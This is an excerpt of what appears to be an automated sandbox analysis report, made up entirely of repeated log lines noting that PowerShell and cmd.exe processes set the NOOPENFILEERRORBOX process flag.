Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
